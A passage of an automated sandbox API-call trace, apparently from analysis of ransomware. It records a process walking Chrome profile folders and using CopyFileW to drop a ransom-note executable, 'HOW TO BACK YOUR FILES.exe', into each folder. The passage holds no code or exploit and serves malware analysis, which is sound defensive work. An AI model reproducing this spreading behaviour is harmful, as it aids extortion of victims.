lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.751] CloseHandle (hObject=0x120) returned 1 [0104.751] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.752] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d125b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d125b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.752] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.752] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.752] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications" [0104.752] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications" [0104.752] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.752] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\web applications\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.753] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.753] GetLastError () returned 0x0 [0104.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.753] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.753] CloseHandle (hObject=0x120) returned 1 [0104.753] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.753] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de75a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de75a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.754] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.754] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.754] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0104.754] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0104.754] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.754] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.755] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.755] GetLastError () returned 0x0 [0104.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.755] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.755] CloseHandle (hObject=0x120) returned 1 [0104.755] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d14bce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d14bce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.755] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.755] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.756] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0104.756] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0104.756] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.756] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\sync extension settings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.756] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.757] GetLastError () returned 0x0 [0104.757] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.757] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.757] CloseHandle (hObject=0x120) returned 1 [0104.757] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.757] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de9bbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de9bbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.757] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.757] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.757] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0104.758] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0104.758] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.758] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.758] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.759] GetLastError () returned 0x0 [0104.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.759] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.759] CloseHandle (hObject=0x120) returned 1 [0104.759] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.759] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d197fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d197fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.759] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.759] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.759] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage" [0104.759] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage" [0104.759] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.760] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\local storage\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.760] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.760] GetLastError () returned 0x0 [0104.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.760] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.761] CloseHandle (hObject=0x120) returned 1 [0104.761] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Storage\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83ede170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d1be100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d1be100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.761] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.761] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.761] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings" [0104.761] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings" [0104.761] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.761] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\local extension settings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.762] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.762] GetLastError () returned 0x0 [0104.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.762] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.762] CloseHandle (hObject=0x120) returned 1 [0104.762] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.763] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dec1d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dec1d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.763] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0104.763] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0104.763] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.763] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.764] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.764] GetLastError () returned 0x0 [0104.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.764] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.764] CloseHandle (hObject=0x120) returned 1 [0104.764] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d1e4260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d1e4260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.765] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.765] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.765] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld" [0104.765] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld" [0104.765] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.765] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\jumplisticonsold\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.766] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, 